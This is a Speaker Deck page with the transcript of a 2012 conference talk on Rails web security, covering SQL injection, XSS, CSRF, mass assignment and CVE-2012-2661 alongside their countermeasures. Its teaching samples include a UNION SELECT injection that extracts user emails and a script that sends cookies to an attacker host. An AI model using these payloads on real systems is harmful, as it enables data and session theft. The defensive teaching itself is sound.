Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Web Application Security in Rails
Search
Sponsored
·
Your Podcast. Everywhere. Effortlessly.
Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.
→
Uri Nativ
November 12, 2012
Programming
600
3
Share
Embed
Copy iframe code
Copy JS code
Copy link
Start on current slide
Web Application Security in Rails
#railsisrael 2012 lecture on web application security in rails
Uri Nativ
November 12, 2012
More Decks by Uri Nativ
See All by Uri Nativ
QA without QA
unativ
8
1.6k
Building an Awesome Engineering Culture
unativ
2
280
Pecha Kucha - Using Scrum Values to Build the Engineering Culture
unativ
0
310
Other Decks in Programming
See All in Programming
例外の正しい扱い方 そのエラー try-catchして大丈夫?
jinwatanabe
0
360
地域 SRE コミュニティ最前線 - ホンマでっかSRE勉強会
tk3fftk
0
220
Welcome to the "Parametricity" 🏙️ − Generic だけど Specific な世界 −
guvalif
PRO
1
160
Skillsは効率化、Agentsは"自分の拡張"——Builder時代のエージェント編成(CC Night 2026)
wemra
1
210
【やさしく解説 設計編 #0】DDDのコード、読めるのに分からない人へ
panda728
PRO
2
260
信頼性について考えてみる(SRE NEXT 2026 miniLT)
hayama17
0
170
SLOをサービス品質の共通言語にするために 取り組んできたこと
wakana0222
0
480
Hunting Vulnerabilities in Symfony with LLMs
vinceamstoutz
0
580
symfony/aiとlaravel/boost
77web
0
120
Snowflake Summitでの新機能 CoCo / CoWork / snowflake-summit-2026-overall-what-new-coco
tatsuhiro
1
220
自作OSでスライド発表する
uyuki234
1
3.8k
SREの積み重ねがAI駆動開発のガードレールになった ― 7つの実践/SRE Guardrails The 7
tomoyakitaura
8
4k
Featured
See All Featured
The AI Search Optimization Roadmap by Aleyda Solis
aleyda
1
6k
Future Trends and Review - Lecture 12 - Web Technologies (1019888BNR)
signer
PRO
0
3.6k
Color Theory Basics | Prateek | Gurzu
gurzu
0
390
Intergalactic Javascript Robots from Outer Space
tanoku
273
27k
Measuring Dark Social's Impact On Conversion and Attribution
stephenakadiri
2
230
Evolution of real-time – Irina Nazarova, EuRuKo, 2024
irinanazarova
9
1.4k
Making the Leap to Tech Lead
cromwellryan
135
10k
Ruling the World: When Life Gets Gamed
codingconduct
0
280
How to build a perfect <img>
jonoalderson
1
5.8k
The Pragmatic Product Professional
lauravandoore
37
7.4k
The #1 spot is gone: here's how to win anyway
tamaranovitovic
3
1.1k
WENDY [Excerpt]
tessaabrams
11
38k
Transcript
WEB APPLICATION SECURITY IN RAILS Uri Nativ RailsIsrael 2012
Uri Nativ @unativ Head of Engineering Klarna Tel Aviv #railsisrael
Buy Now, Pay Later 1. Shop online 2. Receive your
goods 3. Pay
Alice
Bob
Alice and Bob
Alice and Bob
Alice and Bob Like Duh?
Alice and Bob <html> <title> MicroBlogging </title> ... #$@# %#@&*#$
Alice and Bob Hack it!
SQL INJECTION
@results = Micropost.where( "content LIKE '%#{params[:query]%’”).all SELECT 'microposts'.* FROM 'microposts’
WHERE (content LIKE ’%SEARCHSTRING%’) SQL Injection
SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%SEARCHSTRING%') SQL Injection
XXX') UNION SELECT 1, email, 1, 1, 1 FROM users --
SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT
1, email, 1, 1, 1 FROM users -- %') SQL Injection
SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT
1, email, 1, 1, 1 FROM users -- %') SQL Injection
@results = Micropost.where( "content LIKE ?’, "%#{params[:query]}%”) ).all SQL Injection
- countermeasures
CROSS SITE SCRIPTING XSS
<span class="content"> <%= raw feed_item.content %> </span> XSS
<script> document.write('<img src= "http://www.attacker.com/x.png?' + document.cookie + ’” >'); </script>
XSS
<span class="content"> <%= sanitize feed_item.content, :tags => ['a’] %> </span>
XSS - countermeasures
The Attack: Execute arbitrary code / defacement JSON is not
escaped by default CSS can be injected as well Countermeasures: Never trust data from the users Use Markdown (e.g. Redcarpet gem) XSS
CROSS SITE REQUEST FORGERY CSRF
www.blog.com CSRF 1
www.blog.com 2 Click here for free iPad www.freeiPad.com <form name=“evilform”
action=“www.blog.com/….”> … <script> document.evilform.submit() </script> CSRF
www.blog.com www.freeiPad.com <form name=“evilform” action=“www.blog.com/….”> … <script> document.evilform.submit() </script> CSRF
3
www.blog.com www.freeiPad.com <form name=“evilform” action=“www.blog.com/….”> … <script> document.evilform.submit() </script> POST
/blogpost Content=“Kick Me!” CSRF 4
<input name ="authenticity_token” type ="hidden” value ="vyFdEgofzU4oSJJn5wypxq4“ /> CSRF –
Authenticity Token
routes.rb match '/delete_post/:id', to: 'microposts#destroy' CSRF
class ApplicationController < ActionController::Base # commented to easily test forms
# protect_from_forgery ... end CSRF
The Attack: Attacker send requests on the victim’s behalf Doesn’t
depend on XSS Attacked doesn’t need to be logged-in Countermeasures: Use Rails CSRF default protection (do not override it) Use GET for queries Use POST/DELETE/… when updating data Add Sign-out link CSRF
RAILS SPECIFIC ATTACKS
MASS ASSIGNMENT boo[gotcha!]
def create @user = User.new(params[:user]) ... end Mass Assignment
def create @user = User.new(params[:user]) ... end Mass Assignment {
:name => “gotcha”, :admin => true }
Blacklist class User < ActiveRecord::Base attr_protected :admin ... end Mass
Assignment - countermeasures
Whitelist class User < ActiveRecord::Base attr_accessible :name, :email, :password, :password_confirmation
... Mass Assignment - countermeasures
Global Config (whitelist) config.active_record. whitelist_attributes = true Mass Assignment -
countermeasures
The Attack: Unprotected by default :( Countermeasures: Whitelist Blacklist Strong
Parameters (whitelist) Rails 4 Logic moved to the controller Available as a Gem Mass Assignment
SQL INJECTION VULNERABILITY IN RUBY ON RAILS (CVE-2012-2661)
User.where( :id => params[:user_id], :reset_token => params[:token] ) SELECT users.*
FROM users WHERE users.id = 6 AND users.reset_token = ’XYZ' LIMIT 1 CVE-2012-2661 SQL Injection
/users/6/password/edit?token[] SELECT users.* FROM users WHERE users.id = 6 AND
users.reset_token IS NULL LIMIT 1 CVE-2012-2661 SQL Injection
The Attack: SQL Injection - Affected version: Rails < 3.2.4
Countermeasures: Upgrade to Rails 3.2.4 or higher CVE-2012-2661 SQL Injection
------------------------------------------------- | Warning Type | Total | ------------------------------------------------- | Cross
Site Scripting | 2 | | Cross-Site Request Forgery | 1 | | Denial of Service | 1 | | Redirect | 1 | | SQL Injection | 4 | ------------------------------------------------- Brakeman
CONCLUSIONS
Make Love not War
Know the threats – OWASP top 10 Follow Rails conventions
Ruby on Rails Security Guide http://guides.rubyonrails.org/security.html The Ruby on Rails security project http://www.rorsecurity.info Rails security mailing list: http://groups.google.com/group/rubyonrails-security Conclusions
Daniel Amselem for pair programming Irit Shainzinger for the cool
graphics Michael Hartl for his microblogging app tutorial Thanks to…
Pay Online – Safer and Simpler https://github.com/unativ/sample_app